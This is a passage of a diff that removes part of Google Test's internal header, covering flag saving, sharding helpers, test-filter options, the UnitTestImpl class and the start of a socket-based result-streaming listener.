-    list_tests_ = GTEST_FLAG(list_tests);
-    output_ = GTEST_FLAG(output);
-    print_time_ = GTEST_FLAG(print_time);
-    random_seed_ = GTEST_FLAG(random_seed);
-    repeat_ = GTEST_FLAG(repeat);
-    shuffle_ = GTEST_FLAG(shuffle);
-    stack_trace_depth_ = GTEST_FLAG(stack_trace_depth);
-    stream_result_to_ = GTEST_FLAG(stream_result_to);
-    throw_on_failure_ = GTEST_FLAG(throw_on_failure);
-  }
-
-  // The d'tor is not virtual.  DO NOT INHERIT FROM THIS CLASS.
-  ~GTestFlagSaver() {
-    GTEST_FLAG(also_run_disabled_tests) = also_run_disabled_tests_;
-    GTEST_FLAG(break_on_failure) = break_on_failure_;
-    GTEST_FLAG(catch_exceptions) = catch_exceptions_;
-    GTEST_FLAG(color) = color_;
-    GTEST_FLAG(death_test_style) = death_test_style_;
-    GTEST_FLAG(death_test_use_fork) = death_test_use_fork_;
-    GTEST_FLAG(filter) = filter_;
-    GTEST_FLAG(internal_run_death_test) = internal_run_death_test_;
-    GTEST_FLAG(list_tests) = list_tests_;
-    GTEST_FLAG(output) = output_;
-    GTEST_FLAG(print_time) = print_time_;
-    GTEST_FLAG(random_seed) = random_seed_;
-    GTEST_FLAG(repeat) = repeat_;
-    GTEST_FLAG(shuffle) = shuffle_;
-    GTEST_FLAG(stack_trace_depth) = stack_trace_depth_;
-    GTEST_FLAG(stream_result_to) = stream_result_to_;
-    GTEST_FLAG(throw_on_failure) = throw_on_failure_;
-  }
-
- private:
-  // Fields for saving the original values of flags.
-  bool also_run_disabled_tests_;
-  bool break_on_failure_;
-  bool catch_exceptions_;
-  std::string color_;
-  std::string death_test_style_;
-  bool death_test_use_fork_;
-  std::string filter_;
-  std::string internal_run_death_test_;
-  bool list_tests_;
-  std::string output_;
-  bool print_time_;
-  internal::Int32 random_seed_;
-  internal::Int32 repeat_;
-  bool shuffle_;
-  internal::Int32 stack_trace_depth_;
-  std::string stream_result_to_;
-  bool throw_on_failure_;
-} GTEST_ATTRIBUTE_UNUSED_;
-
-// Converts a Unicode code point to a narrow string in UTF-8 encoding.
-// code_point parameter is of type UInt32 because wchar_t may not be
-// wide enough to contain a code point.
-// If the code_point is not a valid Unicode code point
-// (i.e. outside of Unicode range U+0 to U+10FFFF) it will be converted
-// to "(Invalid Unicode 0xXXXXXXXX)".
-GTEST_API_ std::string CodePointToUtf8(UInt32 code_point);
-
-// Converts a wide string to a narrow string in UTF-8 encoding.
-// The wide string is assumed to have the following encoding:
-//   UTF-16 if sizeof(wchar_t) == 2 (on Windows, Cygwin, Symbian OS)
-//   UTF-32 if sizeof(wchar_t) == 4 (on Linux)
-// Parameter str points to a null-terminated wide string.
-// Parameter num_chars may additionally limit the number
-// of wchar_t characters processed. -1 is used when the entire string
-// should be processed.
-// If the string contains code points that are not valid Unicode code points
-// (i.e. outside of Unicode range U+0 to U+10FFFF) they will be output
-// as '(Invalid Unicode 0xXXXXXXXX)'. If the string is in UTF16 encoding
-// and contains invalid UTF-16 surrogate pairs, values in those pairs
-// will be encoded as individual Unicode characters from Basic Normal Plane.
-GTEST_API_ std::string WideStringToUtf8(const wchar_t* str, int num_chars);
-
-// Reads the GTEST_SHARD_STATUS_FILE environment variable, and creates the file
-// if the variable is present. If a file already exists at this location, this
-// function will write over it. If the variable is present, but the file cannot
-// be created, prints an error and exits.
-void WriteToShardStatusFileIfNeeded();
-
-// Checks whether sharding is enabled by examining the relevant
-// environment variable values. If the variables are present,
-// but inconsistent (e.g., shard_index >= total_shards), prints
-// an error and exits. If in_subprocess_for_death_test, sharding is
-// disabled because it must only be applied to the original test
-// process. Otherwise, we could filter out death tests we intended to execute.
-GTEST_API_ bool ShouldShard(const char* total_shards_str,
-                            const char* shard_index_str,
-                            bool in_subprocess_for_death_test);
-
-// Parses the environment variable var as an Int32. If it is unset,
-// returns default_val. If it is not an Int32, prints an error and
-// aborts.
-GTEST_API_ Int32 Int32FromEnvOrDie(const char* env_var, Int32 default_val);
-
-// Given the total number of shards, the shard index, and the test id,
-// returns true iff the test should be run on this shard. The test id is
-// some arbitrary but unique non-negative integer assigned to each test
-// method. Assumes that 0 <= shard_index < total_shards.
-GTEST_API_ bool ShouldRunTestOnShard(
-    int total_shards, int shard_index, int test_id);
-
-// STL container utilities.
-
-// Returns the number of elements in the given container that satisfy
-// the given predicate.
-template <class Container, typename Predicate>
-inline int CountIf(const Container& c, Predicate predicate) {
-  // Implemented as an explicit loop since std::count_if() in libCstd on
-  // Solaris has a non-standard signature.
-  int count = 0;
-  for (typename Container::const_iterator it = c.begin(); it != c.end(); ++it) {
-    if (predicate(*it))
-      ++count;
-  }
-  return count;
-}
-
-// Applies a function/functor to each element in the container.
-template <class Container, typename Functor>
-void ForEach(const Container& c, Functor functor) {
-  std::for_each(c.begin(), c.end(), functor);
-}
-
-// Returns the i-th element of the vector, or default_value if i is not
-// in range [0, v.size()).
-template <typename E>
-inline E GetElementOr(const std::vector<E>& v, int i, E default_value) {
-  return (i < 0 || i >= static_cast<int>(v.size())) ? default_value : v[i];
-}
-
-// Performs an in-place shuffle of a range of the vector's elements.
-// 'begin' and 'end' are element indices as an STL-style range;
-// i.e. [begin, end) are shuffled, where 'end' == size() means to
-// shuffle to the end of the vector.
-template <typename E>
-void ShuffleRange(internal::Random* random, int begin, int end,
-                  std::vector<E>* v) {
-  const int size = static_cast<int>(v->size());
-  GTEST_CHECK_(0 <= begin && begin <= size)
-      << "Invalid shuffle range start " << begin << ": must be in range [0, "
-      << size << "].";
-  GTEST_CHECK_(begin <= end && end <= size)
-      << "Invalid shuffle range finish " << end << ": must be in range ["
-      << begin << ", " << size << "].";
-
-  // Fisher-Yates shuffle, from
-  // http://en.wikipedia.org/wiki/Fisher-Yates_shuffle
-  for (int range_width = end - begin; range_width >= 2; range_width--) {
-    const int last_in_range = begin + range_width - 1;
-    const int selected = begin + random->Generate(range_width);
-    std::swap((*v)[selected], (*v)[last_in_range]);
-  }
-}
-
-// Performs an in-place shuffle of the vector's elements.
-template <typename E>
-inline void Shuffle(internal::Random* random, std::vector<E>* v) {
-  ShuffleRange(random, 0, static_cast<int>(v->size()), v);
-}
-
-// A function for deleting an object.  Handy for being used as a
-// functor.
-template <typename T>
-static void Delete(T* x) {
-  delete x;
-}
-
-// A predicate that checks the key of a TestProperty against a known key.
-//
-// TestPropertyKeyIs is copyable.
-class TestPropertyKeyIs {
- public:
-  // Constructor.
-  //
-  // TestPropertyKeyIs has NO default constructor.
-  explicit TestPropertyKeyIs(const std::string& key) : key_(key) {}
-
-  // Returns true iff the test name of test property matches on key_.
-  bool operator()(const TestProperty& test_property) const {
-    return test_property.key() == key_;
-  }
-
- private:
-  std::string key_;
-};
-
-// Class UnitTestOptions.
-//
-// This class contains functions for processing options the user
-// specifies when running the tests.  It has only static members.
-//
-// In most cases, the user can specify an option using either an
-// environment variable or a command line flag.  E.g. you can set the
-// test filter using either GTEST_FILTER or --gtest_filter.  If both
-// the variable and the flag are present, the latter overrides the
-// former.
-class GTEST_API_ UnitTestOptions {
- public:
-  // Functions for processing the gtest_output flag.
-
-  // Returns the output format, or "" for normal printed output.
-  static std::string GetOutputFormat();
-
-  // Returns the absolute path of the requested output file, or the
-  // default (test_detail.xml in the original working directory) if
-  // none was explicitly specified.
-  static std::string GetAbsolutePathToOutputFile();
-
-  // Functions for processing the gtest_filter flag.
-
-  // Returns true iff the wildcard pattern matches the string.  The
-  // first ':' or '\0' character in pattern marks the end of it.
-  //
-  // This recursive algorithm isn't very efficient, but is clear and
-  // works well enough for matching test names, which are short.
-  static bool PatternMatchesString(const char *pattern, const char *str);
-
-  // Returns true iff the user-specified filter matches the test case
-  // name and the test name.
-  static bool FilterMatchesTest(const std::string &test_case_name,
-                                const std::string &test_name);
-
-#if GTEST_OS_WINDOWS
-  // Function for supporting the gtest_catch_exception flag.
-
-  // Returns EXCEPTION_EXECUTE_HANDLER if Google Test should handle the
-  // given SEH exception, or EXCEPTION_CONTINUE_SEARCH otherwise.
-  // This function is useful as an __except condition.
-  static int GTestShouldProcessSEH(DWORD exception_code);
-#endif  // GTEST_OS_WINDOWS
-
-  // Returns true if "name" matches the ':' separated list of glob-style
-  // filters in "filter".
-  static bool MatchesFilter(const std::string& name, const char* filter);
-};
-
-// Returns the current application's name, removing directory path if that
-// is present.  Used by UnitTestOptions::GetOutputFile.
-GTEST_API_ FilePath GetCurrentExecutableName();
-
-// The role interface for getting the OS stack trace as a string.
-class OsStackTraceGetterInterface {
- public:
-  OsStackTraceGetterInterface() {}
-  virtual ~OsStackTraceGetterInterface() {}
-
-  // Returns the current OS stack trace as an std::string.  Parameters:
-  //
-  //   max_depth  - the maximum number of stack frames to be included
-  //                in the trace.
-  //   skip_count - the number of top frames to be skipped; doesn't count
-  //                against max_depth.
-  virtual string CurrentStackTrace(int max_depth, int skip_count) = 0;
-
-  // UponLeavingGTest() should be called immediately before Google Test calls
-  // user code. It saves some information about the current stack that
-  // CurrentStackTrace() will use to find and hide Google Test stack frames.
-  virtual void UponLeavingGTest() = 0;
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(OsStackTraceGetterInterface);
-};
-
-// A working implementation of the OsStackTraceGetterInterface interface.
-class OsStackTraceGetter : public OsStackTraceGetterInterface {
- public:
-  OsStackTraceGetter() : caller_frame_(NULL) {}
-
-  virtual string CurrentStackTrace(int max_depth, int skip_count)
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  virtual void UponLeavingGTest() GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // This string is inserted in place of stack frames that are part of
-  // Google Test's implementation.
-  static const char* const kElidedFramesMarker;
-
- private:
-  Mutex mutex_;  // protects all internal state
-
-  // We save the stack frame below the frame that calls user code.
-  // We do this because the address of the frame immediately below
-  // the user code changes between the call to UponLeavingGTest()
-  // and any calls to CurrentStackTrace() from within the user code.
-  void* caller_frame_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(OsStackTraceGetter);
-};
-
-// Information about a Google Test trace point.
-struct TraceInfo {
-  const char* file;
-  int line;
-  std::string message;
-};
-
-// This is the default global test part result reporter used in UnitTestImpl.
-// This class should only be used by UnitTestImpl.
-class DefaultGlobalTestPartResultReporter
-  : public TestPartResultReporterInterface {
- public:
-  explicit DefaultGlobalTestPartResultReporter(UnitTestImpl* unit_test);
-  // Implements the TestPartResultReporterInterface. Reports the test part
-  // result in the current test.
-  virtual void ReportTestPartResult(const TestPartResult& result);
-
- private:
-  UnitTestImpl* const unit_test_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DefaultGlobalTestPartResultReporter);
-};
-
-// This is the default per thread test part result reporter used in
-// UnitTestImpl. This class should only be used by UnitTestImpl.
-class DefaultPerThreadTestPartResultReporter
-    : public TestPartResultReporterInterface {
- public:
-  explicit DefaultPerThreadTestPartResultReporter(UnitTestImpl* unit_test);
-  // Implements the TestPartResultReporterInterface. The implementation just
-  // delegates to the current global test part result reporter of *unit_test_.
-  virtual void ReportTestPartResult(const TestPartResult& result);
-
- private:
-  UnitTestImpl* const unit_test_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DefaultPerThreadTestPartResultReporter);
-};
-
-// The private implementation of the UnitTest class.  We don't protect
-// the methods under a mutex, as this class is not accessible by a
-// user and the UnitTest class that delegates work to this class does
-// proper locking.
-class GTEST_API_ UnitTestImpl {
- public:
-  explicit UnitTestImpl(UnitTest* parent);
-  virtual ~UnitTestImpl();
-
-  // There are two different ways to register your own TestPartResultReporter.
-  // You can register your own repoter to listen either only for test results
-  // from the current thread or for results from all threads.
-  // By default, each per-thread test result repoter just passes a new
-  // TestPartResult to the global test result reporter, which registers the
-  // test part result for the currently running test.
-
-  // Returns the global test part result reporter.
-  TestPartResultReporterInterface* GetGlobalTestPartResultReporter();
-
-  // Sets the global test part result reporter.
-  void SetGlobalTestPartResultReporter(
-      TestPartResultReporterInterface* reporter);
-
-  // Returns the test part result reporter for the current thread.
-  TestPartResultReporterInterface* GetTestPartResultReporterForCurrentThread();
-
-  // Sets the test part result reporter for the current thread.
-  void SetTestPartResultReporterForCurrentThread(
-      TestPartResultReporterInterface* reporter);
-
-  // Gets the number of successful test cases.
-  int successful_test_case_count() const;
-
-  // Gets the number of failed test cases.
-  int failed_test_case_count() const;
-
-  // Gets the number of all test cases.
-  int total_test_case_count() const;
-
-  // Gets the number of all test cases that contain at least one test
-  // that should run.
-  int test_case_to_run_count() const;
-
-  // Gets the number of successful tests.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Gets the number of all tests.
-  int total_test_count() const;
-
-  // Gets the number of tests that should run.
-  int test_to_run_count() const;
-
-  // Gets the time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp() const { return start_timestamp_; }
-
-  // Gets the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns true iff the unit test passed (i.e. all test cases passed).
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the unit test failed (i.e. some test case failed
-  // or something outside of all tests failed).
-  bool Failed() const {
-    return failed_test_case_count() > 0 || ad_hoc_test_result()->Failed();
-  }
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  const TestCase* GetTestCase(int i) const {
-    const int index = GetElementOr(test_case_indices_, i, -1);
-    return index < 0 ? NULL : test_cases_[i];
-  }
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  TestCase* GetMutableTestCase(int i) {
-    const int index = GetElementOr(test_case_indices_, i, -1);
-    return index < 0 ? NULL : test_cases_[index];
-  }
-
-  // Provides access to the event listener list.
-  TestEventListeners* listeners() { return &listeners_; }
-
-  // Returns the TestResult for the test that's currently running, or
-  // the TestResult for the ad hoc test if no test is running.
-  TestResult* current_test_result();
-
-  // Returns the TestResult for the ad hoc test.
-  const TestResult* ad_hoc_test_result() const { return &ad_hoc_test_result_; }
-
-  // Sets the OS stack trace getter.
-  //
-  // Does nothing if the input and the current OS stack trace getter
-  // are the same; otherwise, deletes the old getter and makes the
-  // input the current getter.
-  void set_os_stack_trace_getter(OsStackTraceGetterInterface* getter);
-
-  // Returns the current OS stack trace getter if it is not NULL;
-  // otherwise, creates an OsStackTraceGetter, makes it the current
-  // getter, and returns it.
-  OsStackTraceGetterInterface* os_stack_trace_getter();
-
-  // Returns the current OS stack trace as an std::string.
-  //
-  // The maximum number of stack frames to be included is specified by
-  // the gtest_stack_trace_depth flag.  The skip_count parameter
-  // specifies the number of top frames to be skipped, which doesn't
-  // count against the number of frames to be included.
-  //
-  // For example, if Foo() calls Bar(), which in turn calls
-  // CurrentOsStackTraceExceptTop(1), Foo() will be included in the
-  // trace but Bar() and CurrentOsStackTraceExceptTop() won't.
-  std::string CurrentOsStackTraceExceptTop(int skip_count) GTEST_NO_INLINE_;
-
-  // Finds and returns a TestCase with the given name.  If one doesn't
-  // exist, creates one and returns it.
-  //
-  // Arguments:
-  //
-  //   test_case_name: name of the test case
-  //   type_param:     the name of the test's type parameter, or NULL if
-  //                   this is not a typed or a type-parameterized test.
-  //   set_up_tc:      pointer to the function that sets up the test case
-  //   tear_down_tc:   pointer to the function that tears down the test case
-  TestCase* GetTestCase(const char* test_case_name,
-                        const char* type_param,
-                        Test::SetUpTestCaseFunc set_up_tc,
-                        Test::TearDownTestCaseFunc tear_down_tc);
-
-  // Adds a TestInfo to the unit test.
-  //
-  // Arguments:
-  //
-  //   set_up_tc:    pointer to the function that sets up the test case
-  //   tear_down_tc: pointer to the function that tears down the test case
-  //   test_info:    the TestInfo object
-  void AddTestInfo(Test::SetUpTestCaseFunc set_up_tc,
-                   Test::TearDownTestCaseFunc tear_down_tc,
-                   TestInfo* test_info) {
-    // In order to support thread-safe death tests, we need to
-    // remember the original working directory when the test program
-    // was first invoked.  We cannot do this in RUN_ALL_TESTS(), as
-    // the user may have changed the current directory before calling
-    // RUN_ALL_TESTS().  Therefore we capture the current directory in
-    // AddTestInfo(), which is called to register a TEST or TEST_F
-    // before main() is reached.
-    if (original_working_dir_.IsEmpty()) {
-      original_working_dir_.Set(FilePath::GetCurrentDir());
-      GTEST_CHECK_(!original_working_dir_.IsEmpty())
-          << "Failed to get the current working directory.";
-    }
-
-    GetTestCase(test_info->test_case_name(),
-                test_info->type_param(),
-                set_up_tc,
-                tear_down_tc)->AddTestInfo(test_info);
-  }
-
-#if GTEST_HAS_PARAM_TEST
-  // Returns ParameterizedTestCaseRegistry object used to keep track of
-  // value-parameterized tests and instantiate and register them.
-  internal::ParameterizedTestCaseRegistry& parameterized_test_registry() {
-    return parameterized_test_registry_;
-  }
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Sets the TestCase object for the test that's currently running.
-  void set_current_test_case(TestCase* a_current_test_case) {
-    current_test_case_ = a_current_test_case;
-  }
-
-  // Sets the TestInfo object for the test that's currently running.  If
-  // current_test_info is NULL, the assertion results will be stored in
-  // ad_hoc_test_result_.
-  void set_current_test_info(TestInfo* a_current_test_info) {
-    current_test_info_ = a_current_test_info;
-  }
-
-  // Registers all parameterized tests defined using TEST_P and
-  // INSTANTIATE_TEST_CASE_P, creating regular tests for each test/parameter
-  // combination. This method can be called more then once; it has guards
-  // protecting from registering the tests more then once.  If
-  // value-parameterized tests are disabled, RegisterParameterizedTests is
-  // present but does nothing.
-  void RegisterParameterizedTests();
-
-  // Runs all tests in this UnitTest object, prints the result, and
-  // returns true if all tests are successful.  If any exception is
-  // thrown during a test, this test is considered to be failed, but
-  // the rest of the tests will still be run.
-  bool RunAllTests();
-
-  // Clears the results of all tests, except the ad hoc tests.
-  void ClearNonAdHocTestResult() {
-    ForEach(test_cases_, TestCase::ClearTestCaseResult);
-  }
-
-  // Clears the results of ad-hoc test assertions.
-  void ClearAdHocTestResult() {
-    ad_hoc_test_result_.Clear();
-  }
-
-  // Adds a TestProperty to the current TestResult object when invoked in a
-  // context of a test or a test case, or to the global property set. If the
-  // result already contains a property with the same key, the value will be
-  // updated.
-  void RecordProperty(const TestProperty& test_property);
-
-  enum ReactionToSharding {
-    HONOR_SHARDING_PROTOCOL,
-    IGNORE_SHARDING_PROTOCOL
-  };
-
-  // Matches the full name of each test against the user-specified
-  // filter to decide whether the test should run, then records the
-  // result in each TestCase and TestInfo object.
-  // If shard_tests == HONOR_SHARDING_PROTOCOL, further filters tests
-  // based on sharding variables in the environment.
-  // Returns the number of tests that should run.
-  int FilterTests(ReactionToSharding shard_tests);
-
-  // Prints the names of the tests matching the user-specified filter flag.
-  void ListTestsMatchingFilter();
-
-  const TestCase* current_test_case() const { return current_test_case_; }
-  TestInfo* current_test_info() { return current_test_info_; }
-  const TestInfo* current_test_info() const { return current_test_info_; }
-
-  // Returns the vector of environments that need to be set-up/torn-down
-  // before/after the tests are run.
-  std::vector<Environment*>& environments() { return environments_; }
-
-  // Getters for the per-thread Google Test trace stack.
-  std::vector<TraceInfo>& gtest_trace_stack() {
-    return *(gtest_trace_stack_.pointer());
-  }
-  const std::vector<TraceInfo>& gtest_trace_stack() const {
-    return gtest_trace_stack_.get();
-  }
-
-#if GTEST_HAS_DEATH_TEST
-  void InitDeathTestSubprocessControlInfo() {
-    internal_run_death_test_flag_.reset(ParseInternalRunDeathTestFlag());
-  }
-  // Returns a pointer to the parsed --gtest_internal_run_death_test
-  // flag, or NULL if that flag was not specified.
-  // This information is useful only in a death test child process.
-  // Must not be called before a call to InitGoogleTest.
-  const InternalRunDeathTestFlag* internal_run_death_test_flag() const {
-    return internal_run_death_test_flag_.get();
-  }
-
-  // Returns a pointer to the current death test factory.
-  internal::DeathTestFactory* death_test_factory() {
-    return death_test_factory_.get();
-  }
-
-  void SuppressTestEventsIfInSubprocess();
-
-  friend class ReplaceDeathTestFactory;
-#endif  // GTEST_HAS_DEATH_TEST
-
-  // Initializes the event listener performing XML output as specified by
-  // UnitTestOptions. Must not be called before InitGoogleTest.
-  void ConfigureXmlOutput();
-
-#if GTEST_CAN_STREAM_RESULTS_
-  // Initializes the event listener for streaming test results to a socket.
-  // Must not be called before InitGoogleTest.
-  void ConfigureStreamingOutput();
-#endif
-
-  // Performs initialization dependent upon flag values obtained in
-  // ParseGoogleTestFlagsOnly.  Is called from InitGoogleTest after the call to
-  // ParseGoogleTestFlagsOnly.  In case a user neglects to call InitGoogleTest
-  // this function is also called from RunAllTests.  Since this function can be
-  // called more than once, it has to be idempotent.
-  void PostFlagParsingInit();
-
-  // Gets the random seed used at the start of the current test iteration.
-  int random_seed() const { return random_seed_; }
-
-  // Gets the random number generator.
-  internal::Random* random() { return &random_; }
-
-  // Shuffles all test cases, and the tests within each test case,
-  // making sure that death tests are still run first.
-  void ShuffleTests();
-
-  // Restores the test cases and tests to their order before the first shuffle.
-  void UnshuffleTests();
-
-  // Returns the value of GTEST_FLAG(catch_exceptions) at the moment
-  // UnitTest::Run() starts.
-  bool catch_exceptions() const { return catch_exceptions_; }
-
- private:
-  friend class ::testing::UnitTest;
-
-  // Used by UnitTest::Run() to capture the state of
-  // GTEST_FLAG(catch_exceptions) at the moment it starts.
-  void set_catch_exceptions(bool value) { catch_exceptions_ = value; }
-
-  // The UnitTest object that owns this implementation object.
-  UnitTest* const parent_;
-
-  // The working directory when the first TEST() or TEST_F() was
-  // executed.
-  internal::FilePath original_working_dir_;
-
-  // The default test part result reporters.
-  DefaultGlobalTestPartResultReporter default_global_test_part_result_reporter_;
-  DefaultPerThreadTestPartResultReporter
-      default_per_thread_test_part_result_reporter_;
-
-  // Points to (but doesn't own) the global test part result reporter.
-  TestPartResultReporterInterface* global_test_part_result_repoter_;
-
-  // Protects read and write access to global_test_part_result_reporter_.
-  internal::Mutex global_test_part_result_reporter_mutex_;
-
-  // Points to (but doesn't own) the per-thread test part result reporter.
-  internal::ThreadLocal<TestPartResultReporterInterface*>
-      per_thread_test_part_result_reporter_;
-
-  // The vector of environments that need to be set-up/torn-down
-  // before/after the tests are run.
-  std::vector<Environment*> environments_;
-
-  // The vector of TestCases in their original order.  It owns the
-  // elements in the vector.
-  std::vector<TestCase*> test_cases_;
-
-  // Provides a level of indirection for the test case list to allow
-  // easy shuffling and restoring the test case order.  The i-th
-  // element of this vector is the index of the i-th test case in the
-  // shuffled order.
-  std::vector<int> test_case_indices_;
-
-#if GTEST_HAS_PARAM_TEST
-  // ParameterizedTestRegistry object used to register value-parameterized
-  // tests.
-  internal::ParameterizedTestCaseRegistry parameterized_test_registry_;
-
-  // Indicates whether RegisterParameterizedTests() has been called already.
-  bool parameterized_tests_registered_;
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Index of the last death test case registered.  Initially -1.
-  int last_death_test_case_;
-
-  // This points to the TestCase for the currently running test.  It
-  // changes as Google Test goes through one test case after another.
-  // When no test is running, this is set to NULL and Google Test
-  // stores assertion results in ad_hoc_test_result_.  Initially NULL.
-  TestCase* current_test_case_;
-
-  // This points to the TestInfo for the currently running test.  It
-  // changes as Google Test goes through one test after another.  When
-  // no test is running, this is set to NULL and Google Test stores
-  // assertion results in ad_hoc_test_result_.  Initially NULL.
-  TestInfo* current_test_info_;
-
-  // Normally, a user only writes assertions inside a TEST or TEST_F,
-  // or inside a function called by a TEST or TEST_F.  Since Google
-  // Test keeps track of which test is current running, it can
-  // associate such an assertion with the test it belongs to.
-  //
-  // If an assertion is encountered when no TEST or TEST_F is running,
-  // Google Test attributes the assertion result to an imaginary "ad hoc"
-  // test, and records the result in ad_hoc_test_result_.
-  TestResult ad_hoc_test_result_;
-
-  // The list of event listeners that can be used to track events inside
-  // Google Test.
-  TestEventListeners listeners_;
-
-  // The OS stack trace getter.  Will be deleted when the UnitTest
-  // object is destructed.  By default, an OsStackTraceGetter is used,
-  // but the user can set this field to use a custom getter if that is
-  // desired.
-  OsStackTraceGetterInterface* os_stack_trace_getter_;
-
-  // True iff PostFlagParsingInit() has been called.
-  bool post_flag_parse_init_performed_;
-
-  // The random number seed used at the beginning of the test run.
-  int random_seed_;
-
-  // Our random number generator.
-  internal::Random random_;
-
-  // The time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp_;
-
-  // How long the test took to run, in milliseconds.
-  TimeInMillis elapsed_time_;
-
-#if GTEST_HAS_DEATH_TEST
-  // The decomposed components of the gtest_internal_run_death_test flag,
-  // parsed when RUN_ALL_TESTS is called.
-  internal::scoped_ptr<InternalRunDeathTestFlag> internal_run_death_test_flag_;
-  internal::scoped_ptr<internal::DeathTestFactory> death_test_factory_;
-#endif  // GTEST_HAS_DEATH_TEST
-
-  // A per-thread stack of traces created by the SCOPED_TRACE() macro.
-  internal::ThreadLocal<std::vector<TraceInfo> > gtest_trace_stack_;
-
-  // The value of GTEST_FLAG(catch_exceptions) at the moment RunAllTests()
-  // starts.
-  bool catch_exceptions_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(UnitTestImpl);
-};  // class UnitTestImpl
-
-// Convenience function for accessing the global UnitTest
-// implementation object.
-inline UnitTestImpl* GetUnitTestImpl() {
-  return UnitTest::GetInstance()->impl();
-}
-
-#if GTEST_USES_SIMPLE_RE
-
-// Internal helper functions for implementing the simple regular
-// expression matcher.
-GTEST_API_ bool IsInSet(char ch, const char* str);
-GTEST_API_ bool IsAsciiDigit(char ch);
-GTEST_API_ bool IsAsciiPunct(char ch);
-GTEST_API_ bool IsRepeat(char ch);
-GTEST_API_ bool IsAsciiWhiteSpace(char ch);
-GTEST_API_ bool IsAsciiWordChar(char ch);
-GTEST_API_ bool IsValidEscape(char ch);
-GTEST_API_ bool AtomMatchesChar(bool escaped, char pattern, char ch);
-GTEST_API_ bool ValidateRegex(const char* regex);
-GTEST_API_ bool MatchRegexAtHead(const char* regex, const char* str);
-GTEST_API_ bool MatchRepetitionAndRegexAtHead(
-    bool escaped, char ch, char repeat, const char* regex, const char* str);
-GTEST_API_ bool MatchRegexAnywhere(const char* regex, const char* str);
-
-#endif  // GTEST_USES_SIMPLE_RE
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.
-GTEST_API_ void ParseGoogleTestFlagsOnly(int* argc, char** argv);
-GTEST_API_ void ParseGoogleTestFlagsOnly(int* argc, wchar_t** argv);
-
-#if GTEST_HAS_DEATH_TEST
-
-// Returns the message describing the last system error, regardless of the
-// platform.
-GTEST_API_ std::string GetLastErrnoDescription();
-
-// Attempts to parse a string into a positive integer pointed to by the
-// number parameter.  Returns true if that is possible.
-// GTEST_HAS_DEATH_TEST implies that we have ::std::string, so we can use
-// it here.
-template <typename Integer>
-bool ParseNaturalNumber(const ::std::string& str, Integer* number) {
-  // Fail fast if the given string does not begin with a digit;
-  // this bypasses strtoXXX's "optional leading whitespace and plus
-  // or minus sign" semantics, which are undesirable here.
-  if (str.empty() || !IsDigit(str[0])) {
-    return false;
-  }
-  errno = 0;
-
-  char* end;
-  // BiggestConvertible is the largest integer type that system-provided
-  // string-to-number conversion routines can return.
-
-# if GTEST_OS_WINDOWS && !defined(__GNUC__)
-
-  // MSVC and C++ Builder define __int64 instead of the standard long long.
-  typedef unsigned __int64 BiggestConvertible;
-  const BiggestConvertible parsed = _strtoui64(str.c_str(), &end, 10);
-
-# else
-
-  typedef unsigned long long BiggestConvertible;  // NOLINT
-  const BiggestConvertible parsed = strtoull(str.c_str(), &end, 10);
-
-# endif  // GTEST_OS_WINDOWS && !defined(__GNUC__)
-
-  const bool parse_success = *end == '\0' && errno == 0;
-
-  // TODO(vladl@google.com): Convert this to compile time assertion when it is
-  // available.
-  GTEST_CHECK_(sizeof(Integer) <= sizeof(parsed));
-
-  const Integer result = static_cast<Integer>(parsed);
-  if (parse_success && static_cast<BiggestConvertible>(result) == parsed) {
-    *number = result;
-    return true;
-  }
-  return false;
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-// TestResult contains some private methods that should be hidden from
-// Google Test user but are required for testing. This class allow our tests
-// to access them.
-//
-// This class is supplied only for the purpose of testing Google Test's own
-// constructs. Do not use it in user tests, either directly or indirectly.
-class TestResultAccessor {
- public:
-  static void RecordProperty(TestResult* test_result,
-                             const std::string& xml_element,
-                             const TestProperty& property) {
-    test_result->RecordProperty(xml_element, property);
-  }
-
-  static void ClearTestPartResults(TestResult* test_result) {
-    test_result->ClearTestPartResults();
-  }
-
-  static const std::vector<testing::TestPartResult>& test_part_results(
-      const TestResult& test_result) {
-    return test_result.test_part_results();
-  }
-};
-
-#if GTEST_CAN_STREAM_RESULTS_
-
-// Streams test results to the given port on the given host machine.
-class StreamingListener : public EmptyTestEventListener {
- public:
-  // Abstract base class for writing strings to a socket.
-  class AbstractSocketWriter {
-   public:
-    virtual ~AbstractSocketWriter() {}
-
-    // Sends a string to the socket.
-    virtual void Send(const string& message) = 0;
-
-    // Closes the socket.
-    virtual void CloseConnection() {}
-
-    // Sends a string and a newline to the socket.
-    void SendLn(const string& message) {
-      Send(message + "\n");
-    }
-  };
-
-  // Concrete class for actually writing strings to a socket.
-  class SocketWriter : public AbstractSocketWriter {
-   public:
-    SocketWriter(const string& host, const string& port)
-        : sockfd_(-1), host_name_(host), port_num_(port) {
-      MakeConnection();
-    }
-
-    virtual ~SocketWriter() {
-      if (sockfd_ != -1)
-        CloseConnection();
-    }
-
-    // Sends a string to the socket.
-    virtual void Send(const string& message) {
-      GTEST_CHECK_(sockfd_ != -1)
-          << "Send() can be called only when there is a connection.";
-
